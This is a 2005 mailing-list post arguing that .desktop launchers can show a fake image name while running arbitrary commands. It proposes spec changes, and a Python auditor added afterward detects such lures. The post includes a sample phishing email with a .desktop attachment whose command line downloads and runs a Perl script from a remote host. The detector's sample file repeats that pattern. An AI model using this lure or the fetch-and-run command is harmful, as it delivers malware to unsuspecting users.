"Name" key value in desk. entry spec collides with file names, could misguide users?

Diego Calleja diegocg at teleline.es
Sun Mar 13 17:50:34 EET 2005


On Sun, 13 Mar 2005 09:00:26 +0200,
Kalle Vahlman <kalle.vahlman at gmail.com> wrote:

> >    Bug: He'll get a warning because he's trying to overwrite "foo.desktop" with
> > "foo.desktop". User was just seeing "foo" and "bar". He'll never know that "foo"
> > and "bar" had the same name and he won't know how to drag panel's foo.desktop
> > reliably.
> 
> This is annoying when encountered, true, but how often would a user
> see this? The "user way" of creating .desktops is through some UI,
> which at least on GNOME creates a random name for it. The application
> provided .desktops could have this problem, but why would you have two
> of them in the same place (and not want to overwrite)?

I don't know about other people; I don't use gnome "methods for creating a new .desktop file",
I just drag/drop from the menu. I expect users to do the same, and I bet there are people
hitting this. I hit it by using gnome for 30 minutes, it's not a "theoretical problem".


> > Problem 2: What user executes is not what he sees
> >    How to reproduce:
> >    Step 1) Create a whatever.desktop file
> >    Step 2) Set Name="Natalie Portman Nude.jpg"
> >    Step 3) Set Run=evil-executable
> > 
> >    Bug: This is a well-learnt lesson from "another OS", where the user thinks he's
> > opening an image and he's running an evil program, I don't think it needs more
> > explanations.
> 
> So this is somehow different from the situation that I decide to name
> my newest malware executable as "Natalie Portman Nude.jpg" and users
> click on it trying to view it with the default viewer?

Viewer will try to open it and will fail.

> The problem is not new, and is not fixed by removing the most useful
> feature of the whole spec (human readable and translatable names for
> programs).

It's certainly useful. It solves one problem in a nice way - and then it creates more. I agree
that using other methods would be much more difficult, but I don't think it's worth
it to risk users' desktops because of developers' laziness (not an insult, a programmer
should always be lazy, shouldn't he? ;)

Quoting from: http://primates.ximian.com/~miguel/archive/2004/Sep-09.html
"Security: [...] Certain things in the Gnome world have been hard explicitly to avoid
problems of this nature (the never-shipped and luckily-defunct executable-mime-type
handler is one example)"

.desktop brings the problem to us again - .desktop files are themselves an "executable mime
type handler". They're "executable" as long as they have an "Exec" key. The difference here
is that it's even easier to hide them. Example:

mail from: maria at hotmail.com
to: me at localhost
subject: What do you think of my new bikini?
Body: Hi diegocg! I bought a new bikini and I took some photos of it! To see
them, save the attached file in your desktop and double-click it!

attached file: save.to.your.desktop
Name=Bikini zoomed.jpg
Run=wget http://www.foo.com/evilperlscript; perl evilperlscript

Now imagine that the message has been generated from maria's computer by
evilscript and that it sent itself to all her contacts (her contacts trust her).

The .desktop file above *works* (I've tried it), and it's scary. This is a can of worms
that has already been opened and I don't think we want to bring it to Linux.

It's *exactly* what Windows viruses do: autosend themselves attaching a hotgirl.jpg.pif
file. People look at Hotmail (let's forget Outlook), download the file, and try to
open it. Boom.

You claim that:
> The only way to Be Sure (tm) currently is to only use
> software/anything from a trusted source.

And I think that this assumption is broken. ActiveX designers thought the same, "hey,
this is not dangerous, users will decide if they trust unsigned ActiveX controls or not".
Mail addresses can be spoofed too, and that's not going to change tomorrow either.

The first problem is not so important. The second one is; I think that it's a
security issue. I'm supposed to work with computers, so if in the future Linux holds
an important desktop share I don't want to spend my work hours running
GNUspywaredetector. IMHO, the whole desktop file specification needs to be
rethought: symbolic links, POSIX attributes...?

As a temporary - not definitive - measure, the desktop specification should be changed
to require as part of the implementation an optional method to disable the Name and
Run functionality, and require that a "Run" key is just an executable on your system. Being
able to append several commands in a single "Run" key is too dangerous, and it's
too scary that it works.
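A defender's check for the lure pattern described in this mail, added here as an example and not part of the thread or of the xdg specification. It parses the [Desktop Entry] group (the spec's key is Exec; the mail calls it "Run") and flags entries whose display Name looks like a data file while an Exec key is present, or whose Exec value only makes sense when run through a shell. The sample entries are constructed; example.invalid is a placeholder host.

```python
import configparser
import re
import shlex

# Sample entries constructed for this example; the second mirrors the lure
# described in the mail (the spec key is Exec, the mail calls it "Run").
SAMPLES = {
    "editor.desktop": (
        "[Desktop Entry]\nType=Application\nName=Text Editor\n"
        "Exec=gedit %U\nIcon=accessories-text-editor\n"
    ),
    "lure.desktop": (
        "[Desktop Entry]\nType=Application\nName=Bikini zoomed.jpg\n"
        "Exec=wget http://example.invalid/script; perl script\n"
    ),
}

# Extensions a user would read as a data file rather than a program.
DATA_EXT = re.compile(r"\.(jpe?g|png|gif|bmp|pdf|txt|doc|odt|mp3|avi|mpg)$", re.I)
# Characters that only make sense if Exec is being handed to a shell.
SHELL_META = re.compile(r"[;&|`$<>]")
# Interpreters and downloaders that a launcher normally should not call directly.
SUSPECT_ARGV0 = ("sh", "bash", "perl", "python", "wget", "curl")

def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict; keys keep their case."""
    cp = configparser.RawConfigParser(strict=False)   # no % interpolation, %U stays
    cp.optionxform = str                               # keep Name / Exec / Name[es]
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))

def audit(text):
    """Return a list of findings for one .desktop file (empty if it looks sane)."""
    entry = parse_desktop(text)
    name, exe = entry.get("Name", ""), entry.get("Exec", "")
    if not exe:
        return []                 # nothing is launched, so nothing to hide
    findings = []
    if DATA_EXT.search(name.strip()):
        findings.append(f"Name {name!r} looks like a data file but entry runs {exe!r}")
    if SHELL_META.search(exe):
        findings.append(f"Exec contains shell metacharacters: {exe!r}")
    try:
        argv = shlex.split(exe)
    except ValueError:
        argv = []
    if argv and argv[0] in SUSPECT_ARGV0:
        findings.append(f"Exec invokes an interpreter or downloader directly: {argv[0]}")
    return findings

def audit_all(samples=SAMPLES):
    """Audit every sample; returns {filename: [findings]}."""
    return {fn: audit(txt) for fn, txt in samples.items()}
```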
